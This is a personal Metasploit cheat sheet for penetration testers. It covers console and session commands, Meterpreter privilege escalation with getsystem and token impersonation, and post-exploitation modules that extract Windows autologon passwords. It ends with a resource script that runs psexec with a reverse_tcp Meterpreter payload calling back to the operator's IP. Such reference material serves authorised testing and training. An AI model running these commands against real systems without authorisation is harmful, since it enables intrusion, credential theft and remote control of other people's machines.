d4Rk's 1337 h4x0r guide
Metasploit Framework (MSF)

Last updated 3 years ago

The world’s most used penetration testing framework

Start

Start the database

msfdb start

or

systemctl start postgresql

Start the Metasploit Framework console

msfconsole

Exploits

Select exploit

use <exploit>

Run exploit

run

or

exploit

Options

Show options

show options

Show advanced options

show advanced

Set option

set <option> <value>

Set option (global)

setg <option> <value>

Payloads

Show payloads

show payloads

Select payload

set payload <payload>

Sessions

List sessions

sessions -l

Show help for the sessions command

sessions -h

Interact with session

sessions <number>

Send session to background

background

Meterpreter

The shell command will present you with a standard shell on the target system.

shell

Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.

getsystem

Encoders

Show encoders

show encoders

Select encoder

set encoder <encoder>

Misc

Search for exploits

search <term>

Go back

back

Display help

help

Get info about the current module

info

List auxiliary modules

show auxiliary

Multi/handler

Start a listener only (no exploit), to catch incoming payload connections

use exploit/multi/handler

Jobs

Start job in background

run -j

Show jobs

jobs

Post exploitation

This module suggests local meterpreter exploits that can be used.

use post/multi/recon/local_exploit_suggester

This module extracts the plain-text Windows autologon password stored in the Registry.

use post/windows/gather/credentials/windows_autologin

This module will login with the specified username/password and execute the supplied command as a hidden process.

use post/windows/manage/run_as

Meterpreter session

Upgrade a plain shell session to a Meterpreter session (set the session option to the shell's session number)

use post/multi/manage/shell_to_meterpreter

Migrate to another (e.g. more stable) process

migrate <pid>

Get system info

sysinfo

Port forwarding (forward a local port through the session to a port on the target's loopback interface)

portfwd add -l <port> -r 127.0.0.1 -p <port>

Impersonation (Windows)

Look for privileges like SeImpersonatePrivilege, SeDebugPrivilege, etc.

whoami /priv

Load incognito module and list available tokens

load incognito
list_tokens -g

Impersonate e.g. BUILTIN\Administrators (two backslashes are required in the Meterpreter console)

impersonate_token "BUILTIN\\Administrators"

Migrate into a process running under the impersonated account to actually obtain its elevated permissions (holding the token alone does not grant them).

ps
migrate <pid>

Resource Scripts

Resource scripts provide an easy way for you to automate repetitive tasks in Metasploit.

msfconsole -r demo.rc

demo.rc

use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>